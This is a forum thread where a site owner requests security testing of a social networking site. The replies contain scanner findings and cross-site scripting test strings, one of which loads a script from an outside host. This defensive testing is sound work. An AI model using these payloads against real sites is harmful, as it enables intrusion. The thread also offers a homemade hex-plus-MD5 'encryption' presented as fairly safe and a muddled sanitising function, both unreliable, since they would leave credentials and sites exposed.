Groups/Social Network

[homechickie]

Hi everyone

 

I would be grateful if someone could test my site for any security errors. I have a few other people testing, but they have no clue as far as security goes lol.

 

http://www.myfangroups.com

 

I have created a username & password for testing purposes for anyone who does not want to sign up.

 

Username: test

Password: TestAccount1

 

Thanks so much!

[darkfreaks]

Input Type Password Autocomplete Enabled

Password type input named pass from unnamed form with action ./process.php has autocomplete enabled. An attacker with local access could obtain the cleartext password from the browser cache.

The impact of this vulnerability

Possible sensitive information disclosure

How to fix this vulnerability

The password autocomplete should be disabled in sensitive applications. To disable autocomplete, you may use a code similar to < INPUT TYPE="password" AUTOCOMPLETE="off" >

 

User credentials are sent in clear text

The impact of this vulnerability

A third party may be able to read the user credentials by intercepting an unencrypted HTTP connection.

How to fix this vulnerability

Because user credentials usually are considered sensitive information, it is recommended to be sent to the server over an encrypted connection.

[homechickie]

Thanks

 

Something strange though... I have no file named process.php, not sure why that would show up?

[darkfreaks]

lol sorry thats my mistake i forgot to edit that out, i put it as a general error in my scanner.

[Coreye]

Cross Site Scripting(XSS):

You can submit ">code when adding blog entries.

http://www.myfangroups.com/members/test&act=blog&id=10

[tmbrown]

Do you have a class handling the home.php event driven page?  If not how are you handling this?

 

As far as the user credentials go...

 

If you are unable to accommodate SSL into the site then another option (in which i prefer) is to write a method/function depending on your structure to encrypt the values onsubmit.  to be able to truly encrypt you will need ajax to run a processor page to change the actual values on the onchange event.  however here is a php example of encryption and decryption.

 

<?php
public static function Encrypt( $str ){
    $cipher = md5( 15698975412356843216841 );
        $str = bin2hex( $str );
            $hash = $str . $cipher;
                return $hash;
}
public static function Decrypt( $hash ){
    $cipher = md5( 15698975412356843216841 );
        $str = substr( $hash,0,strpos( $hash,$cipher ) );
            $hash = pack( "H*",$str );
                return $hash;
}
?>

 

In Encrypt the string or integer you pass in will be encrypted and a hash will be returned, in Decrypt you pass a hash that has been encrypted and it will return its decrypted value.  This is by no means full-proof.  However md5 is virtually a one way encryption and if they knew where the hex started then they could decrypt it, other than that you'd be fairy safe.

[darkfreaks]

uhm that only works for passwords

 

if you want to make variables safe just use strip_tags,trim, mysql_real_escape_string these will avoid SQL injection and Cross Site Scripting

[tmbrown]

Technically it'll work for any string or integer value you want to pass into it, but i understand what you're saying.  As far as an immediate change you will have to use some javascript to convert the values before the actual form is submitted.  to do this you will need to do something similar to:

 

<script>
    function convPost(){
        var elem = document.forms['yourformid'].elements;
    for (i = 0; i < elem.length; i++) {
                elem[i].value = '<?php Class::Encrypt(elem[i].value);?>';
    }
    }
</script>

[darkfreaks]

that will crypt the variable and decrypt it honestly only time you need it , is when putting a variable inside a link in which case i use htmlspecialchars() so people can't inject code into the link.

[darkfreaks]

<?php

function clean($text){

$text=strip_tags(mysql_real_escape_string(trim(htmlspecialchars($text))));

return $text; 
}?>

 

you can call clean whenever you need to sanitize a variable

[tmbrown]

I understand what you're saying, but i offered my 2 cents worth for if SSL was unavailable.  You are right and I do use these methods for url variables, however it has much potential, but for simplicity sake I agree with your method for encoding.

[darkfreaks]

XSS Injection:

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <IMG DYNSRC="javascript:alert('XSS')">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.

Tested value: <meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;">

 

Also you might want to check your login and groups for XSS and SQL injection